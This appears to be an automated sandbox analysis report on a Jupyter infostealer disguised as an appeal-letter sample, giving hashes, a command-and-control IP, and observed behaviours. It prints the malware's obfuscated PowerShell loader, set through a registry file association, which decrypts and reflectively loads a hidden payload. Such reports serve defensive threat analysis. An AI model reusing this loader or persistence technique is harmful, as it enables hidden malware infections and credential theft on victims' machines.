Analysis
-
max time kernel
302s -
max time network
286s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
01-06-2022 19:48
Static task
static1
General
-
Target
Gifted-And-Talented-Appeal-Letter-Sample (1).exe
-
Size
265.0MB
-
MD5
9113ce41a5c257d8fc3cd740bcb63c08
-
SHA1
b5a27bd5ef4349580f381e8dec5bd78ecfc9c542
-
SHA256
39787d4b45d431380f24bb2c2e505ce1cd369ddc84629f295df892910d0d4e2e
-
SHA512
8a44926c6a67b38481339d44d7665e771bfae2b58d71908a3d3c1783e0b814b1650bce9a06bb62bd334c8fa0a6eaec4d929e4625955749bee383d6651d87359b
Malware Config
Extracted
jupyter
http://146.70.71.174
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2156 Basiradial.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qTuPXyjTpXnQ.MOssCzetxPVw Gifted-And-Talented-Appeal-Letter-Sample (1).exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\ecmlzelggcmjcluxbpdwbtqczvz\shell\open Gifted-And-Talented-Appeal-Letter-Sample (1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\ecmlzelggcmjcluxbpdwbtqczvz\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('PZ2z5Y3u0jdChqecGRWPr4ivKtZu3Z+hkY5hf1X8fOM=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxxVHVQWHlqVHBYblEuTU9zc0N6ZXR4UFZ3'))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[SOYSDdMTA5MzSGO7kyKXM7CJhfH19qETaAs3weTq__MfajC9_zN6Bo3YXknellj7BoL_Yr.Db9v1dgJwoTx1sEzwPxo74Kt7UKHYzj6sRNbthoF]::U7u1m3V0ZwHV1ZZVOpYWmj();\"" Gifted-And-Talented-Appeal-Letter-Sample (1).exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\.mossczetxpvw Gifted-And-Talented-Appeal-Letter-Sample (1).exe Set value (str) \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\.mossczetxpvw\ = "ecmlzelggcmjcluxbpdwbtqczvz" Gifted-And-Talented-Appeal-Letter-Sample (1).exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\ecmlzelggcmjcluxbpdwbtqczvz\shell\open\command Gifted-And-Talented-Appeal-Letter-Sample (1).exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\ecmlzelggcmjcluxbpdwbtqczvz Gifted-And-Talented-Appeal-Letter-Sample (1).exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\ecmlzelggcmjcluxbpdwbtqczvz\shell Gifted-And-Talented-Appeal-Letter-Sample (1).exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 996 Gifted-And-Talented-Appeal-Letter-Sample (1).exe 996 Gifted-And-Talented-Appeal-Letter-Sample (1).exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 996 Gifted-And-Talented-Appeal-Letter-Sample (1).exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 3696 wrote to memory of 2156 3696 Gifted-And-Talented-Appeal-Letter-Sample (1).exe 66 PID 3696 wrote to memory of 2156 3696 Gifted-And-Talented-Appeal-Letter-Sample (1).exe 66 PID 3696 wrote to memory of 2156 3696 Gifted-And-Talented-Appeal-Letter-Sample (1).exe 66 PID 3696 wrote to memory of 996 3696 Gifted-And-Talented-Appeal-Letter-Sample (1).exe 67 PID 3696 wrote to memory of 996 3696 Gifted-And-Talented-Appeal-Letter-Sample (1).exe 67
Processes
-
C:\Users\Admin\AppData\Local\Temp\Gifted-And-Talented-Appeal-Letter-Sample (1).exe"C:\Users\Admin\AppData\Local\Temp\Gifted-And-Talented-Appeal-Letter-Sample (1).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Users\Admin\AppData\Local\Temp\Basiradial.exe"C:\Users\Admin\AppData\Local\Temp\Basiradial.exe"2⤵
- Executes dropped EXE
PID:2156
-
-
C:\Users\Admin\AppData\Local\Temp\Gifted-And-Talented-Appeal-Letter-Sample (1).exe"C:\Users\Admin\AppData\Local\Temp\Gifted-And-Talented-Appeal-Letter-Sample (1).exe" /s2⤵
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:996
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
997KB
MD5dbc534854dd385e59a3f1906ddfb9020
SHA12b3062d82232ce10a8713829199769ff0d12e0fc
SHA25606486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA5121506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951
-
Filesize
997KB
MD5dbc534854dd385e59a3f1906ddfb9020
SHA12b3062d82232ce10a8713829199769ff0d12e0fc
SHA25606486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA5121506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951